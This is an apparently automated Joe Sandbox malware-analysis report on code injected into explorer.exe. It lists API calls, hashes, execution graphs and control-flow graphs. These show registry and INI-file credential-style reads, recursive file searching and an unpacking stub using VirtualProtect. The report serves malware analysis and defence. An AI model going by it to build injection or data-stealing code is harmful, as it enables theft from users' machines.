                                                                                                                          • Opcode ID: 145258e95d0b1d24b793da5a75a80041594f7611dc70a7b356f2befd2086e8ae
                                                                                                                          • Instruction ID: c847ee06c4bd2b26ec3e0cfe0f3dc3c9bc74942946e09a9aa5283e35657db93a
                                                                                                                          • Opcode Fuzzy Hash: 145258e95d0b1d24b793da5a75a80041594f7611dc70a7b356f2befd2086e8ae
                                                                                                                          • Instruction Fuzzy Hash: A7D1F7707083009FDB14DB29C594B2FBBEAEBC8754F14491EE9458B290DB74D945CB92
                                                                                                                          APIs
                                                                                                                          • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 029796E7
                                                                                                                          • _alldiv.NTDLL(00000000,80000000,?,?), ref: 02979707
                                                                                                                          • _alldiv.NTDLL(00000000,80000000,?,?), ref: 02979739
                                                                                                                          • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0297976C
                                                                                                                          • _allmul.NTDLL(?,?,?,?), ref: 02979798
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _alldiv$_allmul
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4215241517-0
                                                                                                                          • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                          • Instruction ID: dd676b889338503c9735a1a5f86545780673f7698f75ca1bd0c2392ebfcd0448
                                                                                                                          • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                          • Instruction Fuzzy Hash: 86214D312047961BF7345D2D4CC0F2B75DFDBD27A9F254E2DED09A2250EB72940085A2
                                                                                                                          APIs
                                                                                                                          • _allmul.NTDLL(?,00000000,00000000), ref: 0298B1B3
                                                                                                                          • _alldvrm.NTDLL(?,?,00000000), ref: 0298B20F
                                                                                                                          • _allrem.NTDLL(?,00000000,?,?), ref: 0298B28A
                                                                                                                          • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0298B298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1484705121-0
                                                                                                                          • Opcode ID: 84bf3754387aafdbdfd78c49232ada95936575408888d155a8a7e3f0bf6b4a2c
                                                                                                                          • Instruction ID: 33b76a60ee13bb52ee7f28413240a5f51166507046c0b5ae053beeb022e489f1
                                                                                                                          • Opcode Fuzzy Hash: 84bf3754387aafdbdfd78c49232ada95936575408888d155a8a7e3f0bf6b4a2c
                                                                                                                          • Instruction Fuzzy Hash: 9C4139756083419FC714EF25C890A2FBBE6AFC8704F49892DF99597361DB31E805CB52
                                                                                                                          APIs
                                                                                                                          • GetHGlobalFromStream.COMBASE(?,?), ref: 029718A7
                                                                                                                          • GlobalLock.KERNEL32(02974B57), ref: 029718B6
                                                                                                                          • GlobalUnlock.KERNEL32(?), ref: 029718F4
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 029718E8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1688112647-0
                                                                                                                          • Opcode ID: ee38a28f40aa586f72fd547ce54e229b177fec2070984c90fda660d774a1a46c
                                                                                                                          • Instruction ID: ae0be717f801730edff84d5ed84dd2df22e48e7b96b031140ce597e7b517b10b
                                                                                                                          • Opcode Fuzzy Hash: ee38a28f40aa586f72fd547ce54e229b177fec2070984c90fda660d774a1a46c
                                                                                                                          • Instruction Fuzzy Hash: C7018175644306AF8B019F26D8189AF7BEEFFC4651B10883EF959D3210DF31C9149B20
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
                                                                                                                          • lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
                                                                                                                          • lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
                                                                                                                          • lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcatlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1475610065-0
                                                                                                                          • Opcode ID: a3943f9a109174114b4eb976d2fada5b948b33a430b416a55d84494bc3b09826
                                                                                                                          • Instruction ID: 2aa27f9bf11161066d619f2c816a44816dabb49af4dcc2d65dc19cf4dafe6da9
                                                                                                                          • Opcode Fuzzy Hash: a3943f9a109174114b4eb976d2fada5b948b33a430b416a55d84494bc3b09826
                                                                                                                          • Instruction Fuzzy Hash: 4CE09B6270421C5B4714B6AEAC94E7B77DDCEC95E53150039FA08E3301FE56DC0546B0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02976A81: memset.NTDLL ref: 02976A9C
                                                                                                                          • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0299F2A1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _aulldivmemset
                                                                                                                          • String ID: %llu$%llu
                                                                                                                          • API String ID: 714058258-4283164361
                                                                                                                          • Opcode ID: 85dff4ea25f6a9a3f77b2255aa1bdb0ac8dc22ce52739d47e98b177ca5a05e57
                                                                                                                          • Instruction ID: 0586a2701540031e645aa5f8926eca33cc1ed3b5b1ceed3bd10d166748790291
                                                                                                                          • Opcode Fuzzy Hash: 85dff4ea25f6a9a3f77b2255aa1bdb0ac8dc22ce52739d47e98b177ca5a05e57
                                                                                                                          • Instruction Fuzzy Hash: 8821D1B26406056BDB10AA68CC41F7FB75EAFC1730F444628F92197AC0DB21AD11CFE1
                                                                                                                          APIs
                                                                                                                          • _allmul.NTDLL(?,00000000,?), ref: 02982174
                                                                                                                          • _allmul.NTDLL(?,?,?,00000000), ref: 0298220E
                                                                                                                          • _allmul.NTDLL(?,00000000,00000000,?), ref: 02982241
                                                                                                                          • _allmul.NTDLL(02972E26,00000000,?,?), ref: 02982295
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _allmul
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4029198491-0
                                                                                                                          • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                          • Instruction ID: bde2fe944bbc6a450bbc95cf3e16d521cb50827fcf09f8b74b77cb235c28d352
                                                                                                                          • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                          • Instruction Fuzzy Hash: 9DA16C70B087419FDB18EF68C890A2EB7EAAFC8704F54492DFA5597250EB70EC45CB42
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1297977491-0
                                                                                                                          • Opcode ID: 149cceb6e52344a524511a2b9635e638a1256b95a8a15f06321815aa01397661
                                                                                                                          • Instruction ID: 846c89658228eb4450ff9e1ebca2e7ea0848d5b41870de9a6de8ecc69fb6b8e3
                                                                                                                          • Opcode Fuzzy Hash: 149cceb6e52344a524511a2b9635e638a1256b95a8a15f06321815aa01397661
                                                                                                                          • Instruction Fuzzy Hash: F58190756083159FC350EF68C880A6BBBEAFFC8704F18496DF88A97251D771E904CB92
                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(?,?,?,?,00000000,02972783), ref: 0297192B
                                                                                                                          • lstrlen.KERNEL32(00000000,?,?,?,00000000,02972783), ref: 02971930
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02971946
                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0297194A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcatlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1475610065-0
                                                                                                                          • Opcode ID: ee9eb3e0259577867b2b47ffdd4cad3ded3e1d99f59095cfa2d2f75657a0e0bb
                                                                                                                          • Instruction ID: 178edabd510c6909490175e2bd9321ce01868372ca2864d9bad280508d04c32b
                                                                                                                          • Opcode Fuzzy Hash: ee9eb3e0259577867b2b47ffdd4cad3ded3e1d99f59095cfa2d2f75657a0e0bb
                                                                                                                          • Instruction Fuzzy Hash: A8E092A370421C2B472476AEAC94E7B76DDDAC95A53190039FA08D3302EE56AC0286B0

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:21.4%
                                                                                                                          Dynamic/Decrypted Code Coverage:86.8%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:182
                                                                                                                          Total number of Limit Nodes:17
                                                                                                                          execution_graph 1016 fda1af 1017 fda1bd 1016->1017 1018 fda1cf 1017->1018 1019 fda298 3 API calls 1017->1019 1020 fda248 1019->1020 1004 fda1f9 1005 fda479 1004->1005 1006 fda228 1004->1006 1009 fda298 1006->1009 1014 fda29d 1009->1014 1010 fda385 LoadLibraryA 1010->1014 1012 fda3e0 VirtualProtect VirtualProtect 1013 fda46e 1012->1013 1013->1013 1014->1010 1014->1012 1015 fda248 1014->1015 949 fda298 954 fda29d 949->954 950 fda385 LoadLibraryA 950->954 952 fda3e0 VirtualProtect VirtualProtect 953 fda46e 952->953 953->953 954->950 954->952 955 fda3d5 954->955 1021 fd3668 1026 fd3458 StrStrIW 1021->1026 1024 fd3458 17 API calls 1025 fd36bd 1024->1025 1027 fd348f 1026->1027 1028 fd350f 1026->1028 1051 fd2774 1027->1051 1030 fd3523 RegOpenKeyExW 1028->1030 1031 fd35e4 1030->1031 1041 fd354d 1030->1041 1033 fd1860 RtlFreeHeap 1031->1033 1032 fd35b5 RegEnumKeyExW 1032->1031 1032->1041 1035 fd35f7 1033->1035 1034 fd34a8 1034->1028 1036 fd3507 1034->1036 1064 fd28a0 1034->1064 1035->1024 1037 fd1860 RtlFreeHeap 1036->1037 1037->1028 1039 fd2700 RtlFreeHeap 1039->1041 1041->1032 1041->1039 1044 fd3458 14 API calls 1041->1044 1047 fd1860 RtlFreeHeap 1041->1047 1042 fd34fa 1045 fd1860 RtlFreeHeap 1042->1045 1044->1041 1045->1036 1047->1041 1050 fd1860 RtlFreeHeap 1050->1042 1052 fd2797 RegOpenKeyExW 1051->1052 1053 fd2793 1051->1053 1054 fd286b 1052->1054 1055 fd27d5 RegQueryValueExW 1052->1055 1053->1052 1056 fd288d 1054->1056 1058 fd2774 RtlFreeHeap 1054->1058 1057 fd285b RegCloseKey 1055->1057 1059 fd27fe 1055->1059 1056->1034 1057->1054 1057->1056 1058->1056 1059->1057 1060 fd281a RegQueryValueExW 1059->1060 1061 fd2851 1060->1061 1063 fd2844 1060->1063 1062 fd1860 RtlFreeHeap 1061->1062 1062->1063 1063->1057 1065 fd28b9 1064->1065 1066 fd2922 1065->1066 1067 fd1860 RtlFreeHeap 1065->1067 1066->1042 1070 fd2700 1066->1070 1069 fd28df 1067->1069 1068 fd2774 5 API calls 1068->1069 1069->1066 1069->1068 1071 fd2712 1070->1071 1072 fd1860 RtlFreeHeap 1071->1072 1073 fd271d 1072->1073 1073->1042 1074 fd3254 1073->1074 1098 fd298c 1074->1098 1077 fd343a 1077->1050 1078 fd298c GetFileAttributesW 1081 fd3295 1078->1081 1079 fd342c 1107 fd30a8 1079->1107 1081->1077 1081->1079 1102 fd2938 1081->1102 1084 fd340c 1086 fd1860 RtlFreeHeap 1084->1086 1085 fd3304 GetPrivateProfileSectionNamesW 1085->1084 1096 fd331e 1085->1096 1087 fd3414 1086->1087 1088 fd1860 RtlFreeHeap 1087->1088 1089 fd341c 1088->1089 1090 fd1860 RtlFreeHeap 1089->1090 1092 fd3424 1090->1092 1091 fd334e GetPrivateProfileStringW 1093 fd3379 GetPrivateProfileIntW 1091->1093 1091->1096 1094 fd1860 RtlFreeHeap 1092->1094 1093->1096 1094->1079 1095 fd30a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1095->1096 1096->1084 1096->1091 1096->1095 1097 fd1860 RtlFreeHeap 1096->1097 1097->1096 1099 fd2999 1098->1099 1101 fd29a9 1098->1101 1100 fd299e GetFileAttributesW 1099->1100 1099->1101 1100->1101 1101->1077 1101->1078 1103 fd2945 1102->1103 1104 fd2980 1102->1104 1103->1104 1105 fd294a CreateFileW 1103->1105 1104->1084 1104->1085 1105->1104 1106 fd2972 CloseHandle 1105->1106 1106->1104 1108 fd30cc 1107->1108 1109 fd30f1 FindFirstFileW 1108->1109 1110 fd3237 1109->1110 1120 fd3117 1109->1120 1111 fd1860 RtlFreeHeap 1110->1111 1112 fd323f 1111->1112 1113 fd1860 RtlFreeHeap 1112->1113 1114 fd3247 1113->1114 1114->1077 1115 fd3210 FindNextFileW 1117 fd3226 FindClose 1115->1117 1115->1120 1116 fd2700 RtlFreeHeap 1116->1120 1117->1110 1118 fd1860 RtlFreeHeap 1118->1115 1120->1115 1120->1116 1120->1118 1121 fd30a8 RtlFreeHeap 1120->1121 1122 fd1860 RtlFreeHeap 1120->1122 1123 fd2f7c 1120->1123 1121->1120 1122->1120 1133 fd2bc0 1123->1133 1126 fd3086 1126->1120 1128 fd307e 1129 fd1860 RtlFreeHeap 1128->1129 1129->1126 1130 fd2e04 RtlFreeHeap 1132 fd2fb6 1130->1132 1131 fd1860 RtlFreeHeap 1131->1132 1132->1126 1132->1128 1132->1130 1132->1131 1134 fd2bf3 1133->1134 1135 fd2700 RtlFreeHeap 1134->1135 1136 fd2c54 1135->1136 1137 fd2a54 RtlFreeHeap 1136->1137 1138 fd2c68 1137->1138 1139 fd2c7e 1138->1139 1140 fd1860 RtlFreeHeap 1138->1140 1141 fd1860 RtlFreeHeap 1139->1141 1140->1139 1147 fd2cb2 1141->1147 1142 fd2da3 1143 fd1860 RtlFreeHeap 1142->1143 1144 fd2dd9 1143->1144 1145 fd1860 RtlFreeHeap 1144->1145 1146 fd2de1 1145->1146 1146->1126 1149 fd2a54 1146->1149 1147->1142 1148 fd1860 RtlFreeHeap 1147->1148 1148->1142 1151 fd2a86 1149->1151 1150 fd2ad9 1150->1132 1151->1150 1152 fd1860 RtlFreeHeap 1151->1152 1152->1150 1157 fd3608 1158 fd3458 17 API calls 1157->1158 1159 fd363b 1158->1159 1160 fd3458 17 API calls 1159->1160 1161 fd365d 1160->1161 956 fd37f4 957 fd3804 956->957 964 fd372c 957->964 960 fd387c 962 fd3817 962->960 974 fd36c8 962->974 965 fd375a 964->965 966 fd3777 RegCreateKeyExW 965->966 967 fd37bc RegCloseKey 966->967 968 fd37cd 966->968 967->968 982 fd1860 968->982 971 fd22b4 972 fd22c8 CreateStreamOnHGlobal 971->972 973 fd22d6 971->973 972->973 973->962 975 fd36cd 974->975 979 fd371e 974->979 976 fd3716 975->976 986 fd21e4 975->986 977 fd1860 RtlFreeHeap 976->977 977->979 979->960 980 fd3706 981 fd1860 RtlFreeHeap 980->981 981->976 984 fd186e 982->984 983 fd1886 983->960 983->971 984->983 985 fd1878 RtlFreeHeap 984->985 985->983 987 fd220b 986->987 992 fd1e20 987->992 990 fd1860 RtlFreeHeap 991 fd2297 990->991 991->980 998 fd1e6d 992->998 993 fd21b5 994 fd1860 RtlFreeHeap 993->994 995 fd21cb 994->995 995->990 996 fd219b 996->993 997 fd1860 RtlFreeHeap 996->997 997->993 998->993 998->996 999 fd2177 998->999 1003 fd1860 RtlFreeHeap 998->1003 1000 fd1860 RtlFreeHeap 999->1000 1001 fd218e 1000->1001 1001->996 1002 fd1860 RtlFreeHeap 1001->1002 1002->996 1003->999 1153 fda1e0 1154 fda1e6 1153->1154 1155 fda298 3 API calls 1154->1155 1156 fda248 1155->1156

                                                                                                                          Callgraph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          • Opacity -> Relevance
                                                                                                                          • Disassembly available
                                                                                                                          callgraph 0 Function_00FD2F7C 3 Function_00FD2EF8 0->3 17 Function_00FD1860 0->17 31 Function_00FD2A54 0->31 39 Function_00FD2BC0 0->39 81 Function_00FD2E04 0->81 1 Function_00FD14F9 2 Function_00FDA1F9 64 Function_00FDA298 2->64 69 Function_00FD2610 3->69 4 Function_00FD2AF8 42 Function_00FD1838 4->42 5 Function_00FD18F8 6 Function_00FD2774 6->6 6->17 6->42 7 Function_00FD37F4 10 Function_00FD2570 7->10 11 Function_00FD2B6C 7->11 14 Function_00FD22E8 7->14 27 Function_00FD2354 7->27 35 Function_00FD36C8 7->35 44 Function_00FD22B4 7->44 49 Function_00FD372C 7->49 50 Function_00FD22AC 7->50 77 Function_00FD2308 7->77 8 Function_00FD1576 9 Function_00FD23F0 51 Function_00FD23AC 9->51 10->27 10->42 58 Function_00FD23A0 10->58 63 Function_00FD2498 11->63 66 Function_00FD2514 11->66 12 Function_00FD156C 13 Function_00FD18E8 15 Function_00FD3668 22 Function_00FD3458 15->22 16 Function_00FD21E4 16->17 16->42 59 Function_00FD1E20 16->59 28 Function_00FD1AD4 17->28 18 Function_00FD1DE0 33 Function_00FD1A4C 18->33 19 Function_00FD1560 20 Function_00FD2360 21 Function_00FDA1E0 21->64 22->6 22->17 22->22 26 Function_00FD3254 22->26 38 Function_00FD29C0 22->38 22->42 57 Function_00FD28A0 22->57 78 Function_00FD2688 22->78 85 Function_00FD2700 22->85 23 Function_00FD9ADA 24 Function_00FDA25A 25 Function_00FDA055 26->17 41 Function_00FD2938 26->41 26->42 52 Function_00FD272C 26->52 54 Function_00FD30A8 26->54 72 Function_00FD298C 26->72 26->78 29 Function_00FD14D4 30 Function_00FD1254 31->17 31->42 32 Function_00FD18D0 34 Function_00FD234C 35->13 35->16 35->17 65 Function_00FD1B14 35->65 36 Function_00FD1C40 37 Function_00FD2340 38->78 39->17 39->31 39->42 43 Function_00FD1938 39->43 39->52 39->69 39->78 39->85 40 Function_00FD9FC2 45 Function_00FD9EB4 46 Function_00FD38B0 46->28 46->42 46->46 47 Function_00FD9930 48 Function_00FD14B2 49->17 49->42 53 Function_00FDA1AF 53->64 54->0 54->4 54->17 54->52 54->54 54->78 54->85 55 Function_00FD47A7 56 Function_00FD99A7 57->6 57->17 57->42 59->5 59->17 59->18 59->32 59->36 59->42 67 Function_00FD1D10 59->67 74 Function_00FD188C 59->74 83 Function_00FD1980 59->83 60 Function_00FD1822 61 Function_00FD141D 62 Function_00FD971C 63->37 63->51 64->24 65->42 66->9 66->20 66->27 66->34 66->58 67->5 67->42 68 Function_00FD2410 68->9 68->51 69->42 70 Function_00FD9912 71 Function_00FD9C92 73 Function_00FD1B8C 73->42 74->42 75 Function_00FDB00C 76 Function_00FD1508 78->42 79 Function_00FD3608 79->22 80 Function_00FD1405 81->17 81->42 81->73 82 Function_00FD4001 84 Function_00FD1000 85->17 85->78

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 184 fd30a8-fd30e3 call fd2688 call fd272c 189 fd30ec-fd3111 call fd2688 FindFirstFileW 184->189 190 fd30e5-fd30e6 184->190 193 fd3237-fd3252 call fd1860 * 2 189->193 194 fd3117-fd3118 189->194 190->189 196 fd311f-fd3124 194->196 198 fd31ad-fd31df call fd2688 call fd2700 196->198 199 fd312a-fd313e 196->199 214 fd3208-fd320b call fd1860 198->214 215 fd31e1-fd31eb call fd2af8 198->215 205 fd3144-fd3158 199->205 206 fd3210-fd3220 FindNextFileW 199->206 205->206 211 fd315e-fd316b call fd272c 205->211 206->196 208 fd3226-fd3230 FindClose 206->208 208->193 219 fd316d-fd3174 211->219 220 fd3176 211->220 214->206 215->214 223 fd31ed-fd3203 call fd2f7c 215->223 222 fd3178-fd31a8 call fd2688 call fd2700 call fd30a8 call fd1860 219->222 220->222 222->198 223->214
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                          • Instruction ID: c5286b12d42ecf8fe891c2542af54ce496155aa332770ebe592a0ddb1ffd69c4
                                                                                                                          • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                          • Instruction Fuzzy Hash: C1419731718B4D5FDB94FB3888487AA73D3FBD4351F484A2AA44AC3351EE78D904A782

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 239 fd38b0-fd3907 call fd1ad4 call fd1838 NtUnmapViewOfSection call fd388c 248 fd3909-fd390c call fd38b0 239->248 249 fd3911-fd391a 239->249 248->249
                                                                                                                          APIs
                                                                                                                          • NtUnmapViewOfSection.NTDLL ref: 00FD38F2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: SectionUnmapView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 498011366-0
                                                                                                                          • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                          • Instruction ID: 0dd3941ae9ee3339cbeab319f3abe7ef70da7af7580dd3f738a7d92645d82cc4
                                                                                                                          • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                          • Instruction Fuzzy Hash: C5F0A020F11A081BEB6C77BD685D3283282EB58310F58052BB615C33D2DC3D8A45A303

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE ref: 00FD27C7
                                                                                                                          • RegQueryValueExW.KERNELBASE ref: 00FD27F4
                                                                                                                          • RegQueryValueExW.KERNELBASE ref: 00FD283A
                                                                                                                          • RegCloseKey.KERNELBASE ref: 00FD2860
                                                                                                                            • Part of subcall function 00FD1860: RtlFreeHeap.NTDLL ref: 00FD1880
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1641618270-0
                                                                                                                          • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                          • Instruction ID: ffbee80049ce16acacb8c6a1400c9ac0cf10029c98c62b59ed8c5db4678ce1b8
                                                                                                                          • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                          • Instruction Fuzzy Hash: D5319630608B488FE7A9DB28D45477A77D1FBB8355F58062FE48AC3364DF24C845A782

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 22 fd372c-fd37ba call fd1838 RegCreateKeyExW 26 fd37bc-fd37cb RegCloseKey 22->26 27 fd37d6-fd37f0 call fd1860 22->27 26->27 28 fd37cd-fd37d3 26->28 28->27
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreate
                                                                                                                          • String ID: ?
                                                                                                                          • API String ID: 2932200918-1684325040
                                                                                                                          • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                          • Instruction ID: 9f3368acaaa0577113775f40c831f12b330563c758035d8655361bdec16ffd5c
                                                                                                                          • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                          • Instruction Fuzzy Hash: 31119070608B488FD750DF69D48866AB7E2FB98305F44062FE48AC3320DF389985DB82

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 31 fda298-fda29b 32 fda2a5-fda2a9 31->32 33 fda2ab-fda2b3 32->33 34 fda2b5 32->34 33->34 35 fda29d-fda2a3 34->35 36 fda2b7 34->36 35->32 37 fda2ba-fda2c1 36->37 39 fda2cd 37->39 40 fda2c3-fda2cb 37->40 39->37 41 fda2cf-fda2d2 39->41 40->39 42 fda2d4-fda2e2 41->42 43 fda2e7-fda2f4 41->43 44 fda31e-fda339 42->44 45 fda2e4-fda2e5 42->45 53 fda30e-fda31c call fda25a 43->53 54 fda2f6-fda2f8 43->54 47 fda36a-fda36d 44->47 45->43 48 fda36f-fda370 47->48 49 fda372-fda379 47->49 51 fda351-fda355 48->51 52 fda37f-fda383 49->52 55 fda33b-fda33e 51->55 56 fda357-fda35a 51->56 57 fda385-fda39e LoadLibraryA 52->57 58 fda3e0-fda3e9 52->58 53->32 59 fda2fb-fda302 54->59 55->49 64 fda340 55->64 56->49 60 fda35c-fda360 56->60 63 fda39f-fda3a6 57->63 61 fda3ec-fda3f5 58->61 79 fda30c 59->79 80 fda304-fda30a 59->80 65 fda341-fda345 60->65 66 fda362-fda369 60->66 67 fda41a-fda46a VirtualProtect * 2 61->67 68 fda3f7-fda3f9 61->68 63->52 70 fda3a8 63->70 64->65 65->51 71 fda347-fda349 65->71 66->47 75 fda46e-fda473 67->75 73 fda40c-fda418 68->73 74 fda3fb-fda40a 68->74 76 fda3aa-fda3b2 70->76 77 fda3b4-fda3bc 70->77 71->51 78 fda34b-fda34f 71->78 73->74 74->61 75->75 81 fda475-fda484 75->81 82 fda3be-fda3ca 76->82 77->82 78->51 78->56 79->53 79->59 80->79 85 fda3cc-fda3d3 82->85 86 fda3d5-fda3df 82->86 85->63
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE ref: 00FDA397
                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00FDA441
                                                                                                                          • VirtualProtect.KERNELBASE ref: 00FDA45F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD9000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD9000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd9000_explorer.jbxd
                                                                                                                          Similarity
